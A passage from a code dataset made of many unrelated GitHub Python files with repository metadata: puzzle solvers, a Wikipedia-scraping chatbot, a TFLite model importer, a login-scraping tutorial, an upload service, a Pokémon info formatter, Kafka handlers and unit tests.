Jeff and David's code.\n\"\"\"\nimport copy\nfrom itertools import permutations, product\nfrom typing import Counter\n\nimport numpy as np\nfrom scipy.spatial.distance import cdist\n\n# Cube rotation matrices\n# https://en.wikipedia.org/wiki/Octahedral_symmetry#Rotation_matrices\ncube_reflections = [np.diag(x) for x in product([-1, 1], repeat=3)]\ncube_rotations = [\n reflection[list(x)]\n for x in permutations(range(3))\n for reflection in cube_reflections\n if np.linalg.det(reflection[list(x)]) > 0\n]\n\n\nclass ScannerRotation:\n def __init__(\n self,\n x_flip: bool,\n y_flip: bool,\n z_flip: bool,\n permutation: tuple[int, int, int],\n ):\n self.x_sign = -1 if x_flip else 1\n self.y_sign = -1 if y_flip else 1\n self.z_sign = -1 if z_flip else 1\n self.permutation = permutation\n\n def rotate(self, points: np.ndarray) -> np.ndarray:\n new_array = np.copy(points[:, self.permutation])\n new_array[:, 0] *= self.x_sign\n new_array[:, 1] *= self.y_sign\n new_array[:, 2] *= self.z_sign\n return new_array\n\n def compose(self, other: \"ScannerRotation\") -> \"ScannerRotation\":\n x_flip = self.x_sign * other.x_sign == -1\n y_flip = self.y_sign * other.y_sign == -1\n z_flip = self.z_sign * other.z_sign == -1\n other_permutation = list(other.permutation)\n permutation = tuple(other_permutation[i] for i in list(self.permutation))\n return ScannerRotation(x_flip, y_flip, z_flip, permutation)\n\n\nclass Scanner:\n def __init__(self, scanner_number: int, list_of_points: list[list[int]]):\n self.scanner_number = scanner_number\n self.beacons = np.array(list_of_points)\n # self.dist_mat = distance_matrix(self.beacons, self.beacons)\n self.offset = np.array([0, 0, 0])\n\n def add_new_points(\n self, other: \"Scanner\", offset: np.ndarray, rotation: ScannerRotation\n ):\n rot_and_trans = (rotation @ other.beacons.T).T - offset\n blist = self.beacons.tolist()\n to_include = [list(point) not in blist for point in rot_and_trans]\n self.beacons = np.append(self.beacons, rot_and_trans[to_include, :], axis=0)\n\n def __repr__(self):\n ret_val = f\"--- scanner {self.scanner_number} ---\\n\"\n for i in range(self.beacons.shape[0]):\n for j in range(self.beacons.shape[1]):\n ret_val += (\",\" if j > 0 else \"\") + str(self.beacons[i, j])\n ret_val += \"\\n\"\n return ret_val\n\n\ndef solve_a(s: str) -> int:\n scanners = parse_input(s)\n to_check = copy.deepcopy(scanners[0])\n to_scan = set(scanners[1:])\n\n while len(to_scan) > 0:\n to_scan = scan_list(to_check, to_scan)\n\n return f\"{to_check.beacons.shape[0]}\"\n\n\ndef parse_input(s: str):\n sensor_lines = s.split(\"\\n\")\n scanners = []\n scanner_beacons: list[list[int]] = []\n ii_scan = -1\n for sensor_line in sensor_lines:\n if \"---\" in sensor_line:\n ii_scan += 1\n scanner_beacons.append([])\n elif len(sensor_line.strip()) != 0:\n scanner_beacons[ii_scan].append([int(x) for x in sensor_line.split(\",\")])\n for scanner in scanner_beacons:\n scanners.append(Scanner(len(scanners), scanner))\n\n return scanners\n\n\ndef scan_list(target: Scanner, to_be_scanned: set[Scanner]) -> set[Scanner]:\n to_remove = set()\n\n for scanner in to_be_scanned:\n for rotation in cube_rotations:\n test_beacons = (rotation @ scanner.beacons.T).T\n dist_mat = np.round(\n cdist(test_beacons, target.beacons, \"cityblock\")\n ).astype(\"int\")\n unique_vals, counts = np.unique(dist_mat, return_counts=\"True\")\n\n point_found = False\n\n for dval in np.unique(counts)[::-1]:\n if dval < 12:\n break\n # check if this possible distance has 12 of the same offset\n offsets_dict = Counter()\n dist_inds = np.where(dist_mat == unique_vals[np.where(counts == dval)])\n for i in range(len(dist_inds[0])):\n offset = tuple(\n test_beacons[dist_inds[0][i]] - target.beacons[dist_inds[1][i]]\n )\n offsets_dict[offset] += 1\n point_found = False\n for val in offsets_dict:\n if offsets_dict[val] >= 12:\n target.add_new_points(scanner, val, rotation)\n scanner.offset = np.array(val)\n to_remove |= {scanner}\n point_found = True\n break\n if point_found:\n break\n if point_found:\n break\n\n return to_be_scanned - to_remove\n\n\ndef solve_b(s: str) -> int:\n scanners = parse_input(s)\n to_check = copy.deepcopy(scanners[0])\n to_scan = set(scanners[1:])\n\n while len(to_scan) > 0:\n to_scan = scan_list(to_check, to_scan)\n\n return f\"{largest_distance(scanners)}\"\n\n\ndef largest_distance(scanners):\n maxdist = -np.inf\n for ii, x in enumerate(scanners):\n for y in scanners[ii:]:\n maxdist = max(np.linalg.norm(x.offset - y.offset, ord=1), maxdist)\n return maxdist\n","repo_name":"dshemetov/advent-of-code-solutions","sub_path":"advent/advent2021/p19.py","file_name":"p19.py","file_ext":"py","file_size_in_byte":5401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"70610132063","text":"# -*- coding: utf-8 -*-\n\n\nimport nltk\nimport numpy as np\nimport random\nimport string\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport bs4 as bs\nimport urllib.request\nimport re\nnltk.download('punkt')\n\n#file1 = open('AI.txt', 'w')\n\nraw_html = urllib.request.urlopen(\"https://en.wikipedia.org/wiki/Chatbot\")\n\n\nraw_html = raw_html.read()\n\n\narticle_html = bs.BeautifulSoup(raw_html, 'lxml')\n\narticle_paragraphs = article_html.find_all('p')\n\narticle_text = ''\n\nfor para in article_paragraphs:\n article_text += para.text\n\n\narticle_text = article_text.lower()\n\n\narticle_text = re.sub(r'\\[[0-9]*\\]', ' ', article_text)\narticle_text = re.sub(r'\\s+', ' ', article_text)\ntype(article_paragraphs)\n\n\narticle_sentences = nltk.sent_tokenize(article_text)\narticle_words = nltk.word_tokenize(article_text)\n\nprint(article_text)\n\n\n\n\n\ndef app(arg):\n raw_html = urllib.request.urlopen(arg)\n\n\n raw_html = raw_html.read()\n\n\n article_html = bs.BeautifulSoup(raw_html, 'lxml')\n\n article_paragraphs = article_html.find_all('p')\n\n article_text = ''\n\n for para in article_paragraphs:\n article_text += para.text\n\n article_text = str(article_text)\n article_text = article_text.lower()\n\n\n article_text = re.sub(r'\\[[0-9]*\\]', ' ', article_text)\n article_text = re.sub(r'\\s+', ' ', article_text)\n article_sentences = nltk.sent_tokenize(article_text)\n article_words = nltk.word_tokenize(article_text)\n #print(article_text)\n return (article_words)\n\ndef app_sentence(arg):\n raw_html = urllib.request.urlopen(arg)\n\n\n raw_html = raw_html.read()\n\n\n article_html = bs.BeautifulSoup(raw_html, 'lxml')\n\n article_paragraphs = article_html.find_all('p')\n\n article_text = ''\n\n for para in article_paragraphs:\n article_text += para.text\n\n article_text = str(article_text)\n article_text = article_text.lower()\n\n\n article_text = re.sub(r'\\[[0-9]*\\]', ' ', article_text)\n article_text = re.sub(r'\\s+', ' ', article_text)\n article_sentences = nltk.sent_tokenize(article_text)\n article_words = nltk.word_tokenize(article_text)\n #print(article_text)\n return (article_sentences)\n\n\ndef app_textm(arg):\n raw_html = urllib.request.urlopen(arg)\n raw_html = raw_html.read()\n\n article_html = bs.BeautifulSoup(raw_html, 'lxml')\n article_paragraphs = article_html.find_all('p')\n article_text = ''\n\n for para in article_paragraphs:\n article_text += para.text\n \n article_text = str(article_text)\n article_text = article_text.lower()\n\n article_text = re.sub(r'\\[[0-9]*\\]', ' ', article_text)\n article_text = re.sub(r'\\s+', ' ', article_text)\n article_sentences = nltk.sent_tokenize(article_text)\n article_words = nltk.word_tokenize(article_text)\n #print(article_text)\n return (article_text)\n\n\n\narticle_text = article_text + app_textm(\"https://en.wikipedia.org/wiki/United_States\") + app_textm(\"https://en.wikipedia.org/wiki/Nature\")\n\narticle_words = app(\"https://en.wikipedia.org/wiki/United_States\") + app(\"https://en.wikipedia.org/wiki/Nature\")\n\narticle_words = article_words + app(\"https://en.wikipedia.org/wiki/Human\") +app(\"https://en.wikipedia.org/wiki/Earth\")+app(\"https://en.wikipedia.org/wiki/Sun\")\n\narticle_sentences = article_sentences + app_sentence(\"https://en.wikipedia.org/wiki/Human\") +app_sentence(\"https://en.wikipedia.org/wiki/Earth\")+app_sentence(\"https://en.wikipedia.org/wiki/Sun\")\n\narticle_text = article_text + app_textm(\"https://en.wikipedia.org/wiki/Human\") +app_textm(\"https://en.wikipedia.org/wiki/Earth\")+ app_textm(\"https://en.wikipedia.org/wiki/Sun\")\n\narticle_sentences = article_sentences + app_sentence(\"https://en.wikipedia.org/wiki/United_States\") + app_sentence(\"https://en.wikipedia.org/wiki/Nature\")\n\nwnlemmatizer = nltk.stem.WordNetLemmatizer()\n\ndef perform_lemmatization(tokens):\n return [wnlemmatizer.lemmatize(token) for token in tokens]\n\npunctuation_removal = dict((ord(punctuation), None) for punctuation in string.punctuation)\n\ndef get_processed_text(document):\n return perform_lemmatization(nltk.word_tokenize(document.lower().translate(punctuation_removal)))\n\ngreeting_inputs = (\"hey\", \"HI\", \"good morning\", \"good evening\", \"morning\", \"evening\", \"hi\", \"whatsup\",\"hello\",\"howdy\",\"you fine\",\"what are you doing\")\ngreeting_responses = [\"Hey\", \"Hey Hows you?\", \"*Nods*\", \"Hello, How you doing\", \"Hello\", \"Welcome, I am good and you\",\"Hello Ask me something \",\"Hey back bro\"]\n\ndef generate_greeting_response(greeting):\n for token in greeting.split():\n if token.lower() in greeting_inputs:\n return random.choice(greeting_responses)\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\ndef generate_response(user_input):\n tennisrobo_response = ''\n article_sentences.append(user_input)\n\n word_vectorizer = TfidfVectorizer(tokenizer=get_processed_text, stop_words='english')\n all_word_vectors = word_vectorizer.fit_transform(article_sentences)\n similar_vector_values = cosine_similarity(all_word_vectors[-1], all_word_vectors)\n similar_sentence_number = similar_vector_values.argsort()[0][-2]\n\n matched_vector = similar_vector_values.flatten()\n matched_vector.sort()\n vector_matched = matched_vector[-2]\n\n if vector_matched == 0:\n tennisrobo_response = tennisrobo_response + \"I am sorry ? Can you elborate please :p\"\n return tennisrobo_response\n else:\n tennisrobo_response = tennisrobo_response + article_sentences[similar_sentence_number]\n return tennisrobo_response\n\nnltk.download('wordnet')\nword_vectorizer = TfidfVectorizer(tokenizer=get_processed_text, stop_words='english')\nall_word_vectors = word_vectorizer.fit_transform(article_sentences)\n\nsimilar_vector_values = cosine_similarity(all_word_vectors[-1], all_word_vectors)\n\nsimilar_sentence_number = similar_vector_values.argsort()[0][-2]\n\ncontinue_dialogue = True\nprint(\"Hello, I am your friend AI_BOT.You can ask me any question regarding a lot of things :\")\nwhile(continue_dialogue == True):\n human_text = input()\n human_text = human_text.lower()\n if human_text != 'bye':\n if human_text == 'thanks' or human_text == 'thank you very much' or human_text == 'thank you bro':\n continue_dialogue = False\n print(\"AI_BOT: Most welcome\")\n else:\n if generate_greeting_response(human_text) != None:\n print(\"AI_BOT: \" + generate_greeting_response(human_text))\n else:\n print(\"AI_BOT: \", end=\"\")\n print(generate_response(human_text))\n article_sentences.remove(human_text)\n else:\n continue_dialogue = False\n print(\"AI_BOT: Good bye and take care of yourself...\")\n\n\n\n\n\n\n\n","repo_name":"starktynt/NN_nltk-chatbot","sub_path":"python_chatbot.py","file_name":"python_chatbot.py","file_ext":"py","file_size_in_byte":6653,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"69916523105","text":"# 풀이 과정\n# https://blog.naver.com/alsrua7222/222630179772\n\nimport sys\ninput = sys.stdin.readline\n\nfor _ in range(int(input())):\n x, y = map(int, input().split())\n if x == y:\n print(0)\n else:\n r = int((y - x) ** .5 + .5)\n if y - x <= r ** 2:\n print(r * 2 - 1)\n else:\n print(r * 2)","repo_name":"alsrua7222/BOJ_Algorithm_Study","sub_path":"Solved/4000/4395/4395.py","file_name":"4395.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"5655011289","text":"from qti.aisw.converters.common.utils.argparser_util import ArgParserWrapper\nfrom .relay_importer import RelayImporter\nfrom tvm.relay.frontend import tflite as tflite_to_relay\n\n# TFLite.Model.Model has changed to TFLite.Model from 1.14 to 2.1\ntry:\n import tflite\nexcept TypeError:\n import tflite.Model as tflite\n\n\nclass TFLiteImporter(RelayImporter):\n class ArgParser(ArgParserWrapper):\n def __init__(self, **kwargs):\n super(TFLiteImporter.ArgParser, self).__init__(conflict_handler='resolve', **kwargs)\n self.add_required_argument('-d', '--input_dim', nargs=2, action='append',\n metavar=('INPUT_NAME', 'INPUT_DIM'),\n help=\"The names and dimensions of the network input layers specified \"\n \"in the format [input_name comma-separated-dimensions], \"\n \"for example: \\n\"\n \" 'data' 1,224,224,3\\n\"\n \"Note that the quotes should always be included in order to handle\"\n \"special characters, spaces, etc. \\n\"\n \"For multiple inputs specify multiple --input_dim on the command \"\n \"line like: \\n\"\n \" --input_dim 'data1' 1,224,224,3 --input_dim 'data2' 1,50,100,3\")\n self.add_optional_argument('--input_dtype', nargs=2, action='append',\n metavar=('INPUT_NAME', 'INPUT_DTYPE'),\n help=\"The names and datatype of the network input layers specified \"\n \"in the format [input_name datatype], \"\n \"for example: \\n\"\n \" 'data' 'float32'\\n\"\n \"Default is float32 if not specified\\n\"\n \"Note that the quotes should always be included in order to handle\"\n \"special characters, spaces, etc. \\n\"\n \"For multiple inputs specify multiple --input_dtype on the command \"\n \"line like: \\n\"\n \" --input_dtype 'data1' 'float32' --input_dtype 'data2' 'float32'\")\n\n def __init__(self, args):\n super(TFLiteImporter, self).__init__(args)\n\n self.shape_dict = {}\n for in_name, in_dims in args.input_dim:\n self.shape_dict[in_name] = [int(i) for i in in_dims.split(',')]\n\n if args.input_dtype:\n self.dtype_dict = {in_name: in_dtype for in_name, in_dtype in args.input_dtype}\n else:\n self.dtype_dict = {}\n for input_name in self.shape_dict:\n if input_name not in self.dtype_dict:\n self.dtype_dict[input_name] = \"float32\"\n\n def convert_to_relay(self, input_model_path, **kwargs):\n if isinstance(input_model_path, str):\n tflite_model_buf = open(input_model_path, \"rb\").read()\n elif isinstance(input_model_path, bytes):\n tflite_model_buf = input_model_path\n else:\n raise TypeError(\"Unsupported type {} for {}\".format(type(input_model_path), input_model_path))\n tflite_model = tflite.Model.GetRootAsModel(tflite_model_buf, 0)\n try:\n self.mod, self.params, output_names_dict = tflite_to_relay.from_tflite(tflite_model, self.shape_dict, self.dtype_dict)\n except ValueError:\n self.mod, self.params = \\\n tflite_to_relay.from_tflite(tflite_model, self.shape_dict, self.dtype_dict)\n output_names_dict = {}\n return self.mod, self.params, output_names_dict\n","repo_name":"senthilkumarl87/snpe-docker","sub_path":"snpe-1.53.2/lib/python/qti/aisw/converters/relay/importers/tflite_importer.py","file_name":"tflite_importer.py","file_ext":"py","file_size_in_byte":3989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36759258016","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom requests import Session, exceptions\n\nfrom requests.auth import HTTPBasicAuth\n\nfrom utils import connection_util\n\n\ndef post_login():\n params = {'username': 'admin', 'passwd': '123alsdfiow####***'}\n\n r = requests.post(\"http://www.test.com/admin/index.php?c=session&a=login\", data=params)\n print(r.text)\n\n\ndef upload_image():\n files = {'uploadFile': open('files/2fe7243c7c113fad443b375a021801eb6277169d.png', 'rb')}\n r = requests.post(\"http://pythonscraping.com/pages/processing2.php\", files=files)\n print(r.text)\n\n\ndef http_auth():\n auth = HTTPBasicAuth('user', '123##@de09pp')\n r = requests.post(url=\"http://www.test.com:1111/\", auth=auth)\n print(r.text)\n\n\nclass GetCookie(object):\n def __init__(self):\n self._session = Session()\n self._init_connection = connection_util.ProcessConnection()\n\n def get_cookie_by_login(self):\n get_token = self.get_request_verification_token()\n # 另外一个 session 中\n # get_token=self.request_verification_token()\n if get_token:\n params = {'__RequestVerificationToken': get_token, 'Email': '123@gmail.com',\n 'Password': '123@pd-09',\n 'RememberMe': True}\n r = self._session.post('https://pdf-lib.org/account/admin', params)\n # 如果使用 request_verification_token 此处会出现 500 错误\n if r.status_code == 500:\n print(r.content.decode('utf-8'))\n print('Cookie is set to:')\n print(r.cookies.get_dict())\n print('--------------------------------')\n print('Going to post article page..')\n # 此处如果是使用 requests.get 并不会获取后台文章内容,由于并不是在同一个会话对象当中\n # r = requests.get('https://pdf-lib.org/account/users')\n r = self._session.get('https://pdf-lib.org/account/users')\n print(r.text)\n\n def get_request_verification_token(self):\n # 连接网站\n try:\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\"}\n html = self._session.get(\"https://pdf-lib.org/account/admin\", headers=headers)\n except (exceptions.ConnectionError, exceptions.HTTPError, exceptions.Timeout) as e:\n return False\n try:\n bsObj = BeautifulSoup(html.text, features='html.parser')\n except AttributeError as e:\n return False\n if bsObj:\n try:\n get_token = bsObj.find(\"input\", {\"name\": \"__RequestVerificationToken\"}).get(\"value\")\n except Exception as e:\n print(f\"ot unhandled exception {e}\")\n return False\n return get_token\n\n def request_verification_token(self):\n # 此处仍然会获取所需要的内容\n get_content = self._init_connection.init_connection('https://pdf-lib.org/account/admin')\n if get_content:\n try:\n get_token = get_content.find(\"input\", {\"name\": \"__RequestVerificationToken\"}).get(\"value\")\n except Exception as e:\n print(f\"ot unhandled exception {e}\")\n return False\n return get_token\n\n\nif __name__ == '__main__':\n http_auth()\n","repo_name":"sycct/Scrape_1_1","sub_path":"form_post.py","file_name":"form_post.py","file_ext":"py","file_size_in_byte":3626,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"} +{"seq_id":"4706283349","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, unicode_literals\n\nimport base64\nimport logging\nimport math\nimport os\nimport shutil\nfrom collections import namedtuple\nfrom io import BytesIO\n\nfrom PIL import Image\nfrom ziggurat_cms.models.element_upload import ElementUpload\nfrom ziggurat_cms.lib import generate_slug_text\nfrom ziggurat_foundations.models.services import BaseService\n\nlog = logging.getLogger(__name__)\n\nFileNameTuple = namedtuple('FileNameTuple',\n ['filename', 'orginal_filename', 'extension'])\n\n\nclass ElementUploadBaseService(BaseService):\n @classmethod\n def gen_directory(cls, root_dir, path_dir, pkey=None):\n abs_upload_dir = os.path.abspath(os.path.join(root_dir, path_dir))\n if not os.path.exists(abs_upload_dir):\n os.mkdir(abs_upload_dir, mode=0o774)\n\n if pkey is None:\n return abs_upload_dir\n\n milions = math.floor(pkey / 1000000)\n abs_mil_path = os.path.abspath(\n os.path.join(root_dir, path_dir, str(milions)))\n if not os.path.exists(abs_mil_path):\n os.mkdir(abs_mil_path, mode=0o774)\n\n thousands = math.floor((pkey - milions * 1000000) / 5000)\n final_path = os.path.join(path_dir, str(milions), str(thousands))\n abs_final_path = os.path.abspath(\n os.path.join(root_dir, final_path))\n if not os.path.exists(abs_final_path):\n os.mkdir(abs_final_path, mode=0o774)\n return abs_final_path\n\n @classmethod\n def gen_filename(cls, pkey, prefix, filename):\n orginal_filename = os.path.basename(filename)\n extension = None\n split_ext = os.path.splitext(orginal_filename)\n if len(split_ext) > 1:\n extension = split_ext[1]\n name = generate_slug_text(orginal_filename, allow_dots=True)\n filename = '{}_{}_{}'.format(pkey, prefix, name)\n return FileNameTuple(filename, orginal_filename, extension[1:])\n\n @classmethod\n def save_file(cls, file_obj, upload_dir, filename):\n final_path = os.path.abspath(os.path.join(upload_dir, filename))\n try:\n log.info('copying to %s' % upload_dir)\n shutil.copyfileobj(file_obj, open(final_path, 'w+b'))\n except Exception as exc:\n log.error(str(exc), extra={\n 'file_name': filename,\n 'upload_dir': upload_dir,\n 'exception_message': str(exc),\n 'callable': 'ElementUploadService.save_file'\n })\n raise\n\n @classmethod\n def delete_file(cls, root_dir, upload_dir, filename):\n final_path = os.path.abspath(\n os.path.join(root_dir, upload_dir, filename))\n try:\n os.remove(final_path)\n except Exception as exc:\n log.error(\n str(exc), extra={\n 'file_name': filename,\n 'final_path': final_path,\n 'callable': 'ElementUploadService.delete_file'\n })\n\n @classmethod\n def by_uuid(cls, uuid, db_session):\n query = db_session.query(ElementUpload)\n query = query.filter(ElementUpload.uuid == uuid)\n return query.first()\n\n\nclass ElementUploadImageBaseService(ElementUploadBaseService):\n @classmethod\n def get_image_obj(cls, file_obj):\n return Image.open(file_obj)\n\n @classmethod\n def save_resized_image(cls, image_obj, filename, upload_dir, max_size):\n final_path = os.path.abspath(os.path.join(upload_dir, filename))\n if image_obj.size[0] > max_size[0] or image_obj.size[1] > max_size[1]:\n copied = image_obj.copy()\n copied.thumbnail(max_size)\n copied.save(final_path)\n else:\n image_obj.save(final_path)\n\n @classmethod\n def base64_thumbnail(cls, image_obj, size):\n image_obj.thumbnail(size)\n jpg_fp = BytesIO()\n image_obj.save(jpg_fp, format='jpeg')\n encoded = base64.b64encode(jpg_fp.getvalue())\n return encoded.decode()\n","repo_name":"ergo/ziggurat_cms","sub_path":"backend/ziggurat_cms/services/element_upload.py","file_name":"element_upload.py","file_ext":"py","file_size_in_byte":4045,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"23309561986","text":"\"\"\" Script to split raw images to individual parking slots.\n\nusage: split_raw_images.py [-h] --input-folder INPUT_FOLDER --output-folder\n OUTPUT_FOLDER --conf CONF\n\noptional arguments:\n -h, --help show this help message and exit\n --input-folder INPUT_FOLDER, -i INPUT_FOLDER\n input folder with raw images\n --output-folder OUTPUT_FOLDER, -o OUTPUT_FOLDER\n output folder with cropped slot images\n --conf CONF, -c CONF parking configuration json\n\"\"\"\n\nimport argparse\nimport json\nimport os\n\nfrom crop_helpers import verify_conf, create_output_folder, extract_and_save\n\n\ndef main():\n \"\"\" Main function.\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('--input-folder', '-i', dest='input_folder',\n help='input folder with raw images', required=True)\n parser.add_argument('--output-folder', '-o', dest='output_folder',\n help='output folder with cropped slot images',\n required=True)\n parser.add_argument('--conf', '-c', dest='conf',\n help='parking configuration json', required=True)\n args = parser.parse_args()\n with open(args.conf) as f_conf:\n conf = json.load(f_conf)\n\n verify_conf(conf)\n create_output_folder(args.output_folder, conf)\n for filename in os.listdir(args.input_folder):\n if filename.endswith('.jpg'):\n extract_and_save(os.path.join(args.input_folder, filename),\n args.output_folder,\n conf)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"SoftServeInc/smartparking","sub_path":"model/split_raw_images.py","file_name":"split_raw_images.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"7"} +{"seq_id":"71161630942","text":"from evolutions import get_evolutions\nfrom emoji import typing_emoji, stats_rating_emoji\nfrom misc import get_abilities, get_gender_percentage, stat_abbr\n\n\ndef get_base_data(pk, pkmn_data, species, extra_data):\n name = species.names[7].name\n artwork_link = pkmn_data.sprites.front_default.replace(\"pokemon\", \"pokemon/other/official-artwork\")\n dex_number = species.order\n types = [ty.type.name.title() for ty in pkmn_data.types]\n types_text = \" / \".join(types)\n emoji = typing_emoji(types[0])\n abilities = get_abilities(pkmn_data)\n abilities_text = \" / \".join(abilities[\"abilities\"])\n hidden_ability = abilities[\"hidden_ability\"] if abilities[\"hidden_ability\"] else \"---\"\n evolution_text = get_evolutions(pk, species)\n stats = {stat.stat.name: stat.base_stat for stat in pkmn_data.stats}\n rating = stats_rating_emoji(stats)\n genus = species.genera[7].genus\n height = str(pkmn_data.height / 10) + \" m\"\n weight = str(pkmn_data.weight / 10) + \" kg\"\n text = f\"\"\"{name}
{emoji}\nSpecies: {genus}\nNational Dex number: {dex_number}\nType: {types_text}\nAbilities: {abilities_text}\nHidden Ability: {hidden_ability}\nHeight: {height}\nWeight: {weight}\n\nEvolutions\n{evolution_text}\n{extra_data}\nBase stats\n{stats[\"hp\"]} HP {rating[\"hp\"]}\n{stats[\"attack\"]} ATK {rating[\"attack\"]}\n{stats[\"defense\"]} DEF {rating[\"defense\"]}\n{stats[\"special-attack\"]} SPA {rating[\"special-attack\"]}\n{stats[\"special-defense\"]} SPD {rating[\"special-defense\"]}\n{stats[\"speed\"]} SPE {rating[\"speed\"]}\n \"\"\"\n return text\n\n\ndef get_advanced_data(pkmn_data, species):\n gender_percentage = get_gender_percentage(species)\n base_friendship = species.base_happiness\n ev_yield = {stat_abbr(stat.stat.name): stat.effort for stat in pkmn_data.stats if stat.effort != 0}\n ev_yield_text = \" / \".join([str(ev_yield[stat]) + \" \" + stat for stat in ev_yield])\n catch_rate = species.capture_rate\n growth_rate = species.growth_rate.name.title().replace(\"-\", \" \")\n egg_groups = [group.name.title().replace(\"-\", \" \") for group in species.egg_groups]\n egg_groups_text = \" / \".join(egg_groups)\n egg_cycles = species.hatch_counter\n text = f\"\"\"\\nGames data\nGender (male/female): {gender_percentage}\nBase friendship: {base_friendship}\nEV yield: {ev_yield_text}\nCatch rate: {catch_rate}\nGrowth rate: {growth_rate}\nEgg groups: {egg_groups_text}\nEgg cycles: {egg_cycles}\n\"\"\"\n return text\n\n\ndef pokemon_text(pk, pkmn, expanded):\n pkmn_data = pk.get_pokemon(pkmn)\n species = pk.get_pokemon_species(pkmn)\n extra_data = get_advanced_data(pkmn_data, species) if expanded else \"\"\n return get_base_data(pk, pkmn_data, species, extra_data)\n","repo_name":"Bharathboy1/Bharath","sub_path":"src/pokemon.py","file_name":"pokemon.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"13173663502","text":"import itertools\n\n\ndef _is_pre(s, ch, need_space):\n if not s.startswith(ch):\n return\n r = len(list(itertools.takewhile(lambda c: ch == c, s)))\n if not need_space:\n return r\n if r < len(s) and s[r].isspace():\n return r\n\n\ndef is_line_head(s):\n return _is_pre(s, '+', True)\n\n\ndef get_headers(filename, lines):\n '''\n Gets list of tuples in format:\n ((x1, y1, x2, y2), level, title, icon)\n '''\n res = []\n tick = False\n for i, s in enumerate(lines):\n if not s.strip():\n continue\n if s.lstrip().startswith('<<'):\n tick = True\n continue\n if s.lstrip().startswith('>>'):\n tick = False\n continue\n if tick:\n continue\n r = is_line_head(s)\n if r:\n res.append( ((0, i, 0, i+1), r, s[r:].strip(), -1) )\n return res\n","repo_name":"CudaText-addons/cuda_tree_wikidpad","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"39782947080","text":"import json\nimport logging\nfrom utils import get_consumer\n\nformatter = logging.Formatter(\"%(asctime)s %(levelname)s %(message)s\")\n\nhandler = logging.FileHandler(\"app.log\")\nhandler.setFormatter(formatter)\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\nlogger.addHandler(handler)\n\ndef handle_order_confirmed(msg):\n username = msg.value[\"user\"]\n logger.info(f\"(Order confirmed) Email sent to {username}\")\n\n\ndef handle_order_completed(msg):\n username = msg.value[\"user\"]\n logger.info(f\"(Order delivered) Email sent to {username}\")\n\n\ndef messaging_service():\n print(\"Messaging service listening...\")\n handlers = {\n \"order_confirmed\": handle_order_confirmed,\n \"order_completed\": handle_order_completed,\n }\n topics=[\"order_confirmed\", \"order_completed\"]\n consumer = get_consumer(\"messaging-group\", topics)\n for msg in consumer:\n handler = handlers.get(msg.topic)\n if handler:\n handler(msg)\n\n\nif __name__ == \"__main__\":\n messaging_service()\n","repo_name":"quamejnr/kafka-app","sub_path":"messaging_service/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"11944753148","text":"import unittest\nfrom erp_app import app, db\nfrom erp_app.models.user import User\nfrom erp_app.models.department import Department\nfrom erp_app.models.noodle_manufacturing_process import NoodleManufacturingProcess\nfrom erp_app.services.noodle_manufacturing_process_service import start_process, end_process\n\nclass TestNoodleManufacturingProcess(unittest.TestCase):\n\n def setUp(self):\n self.app = app.test_client()\n self.db = db\n\n self.user = User(username='test', password='test')\n self.department = Department(name='Manufacturing')\n self.noodle_process = NoodleManufacturingProcess(name='Test Process')\n\n self.db.session.add(self.user)\n self.db.session.add(self.department)\n self.db.session.add(self.noodle_process)\n self.db.session.commit()\n\n def tearDown(self):\n self.db.session.remove()\n self.db.drop_all()\n\n def test_start_process(self):\n response = start_process(self.user.id, self.department.id, self.noodle_process.id)\n self.assertEqual(response, 'process_start')\n\n def test_end_process(self):\n response = end_process(self.user.id, self.department.id, self.noodle_process.id)\n self.assertEqual(response, 'process_end')\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"Asenterprises/AICO","sub_path":"erp_app/tests/test_noodle_manufacturing_process.py","file_name":"test_noodle_manufacturing_process.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"37729796653","text":"class Solution:\n def mostFrequent(self, nums: List[int], key: int) -> int:\n \"\"\"\n Logic: Hash Map/Counter\n \n Time: O(n)\n Space: O(n)\n \"\"\"\n target = collections.defaultdict(int)\n\n for i in range(len(nums)-1):\n if nums[i] == key:\n target[nums[i+1]] += 1\n \n for k, v in target.items():\n if v == max(target.values()):\n return k\n \n return 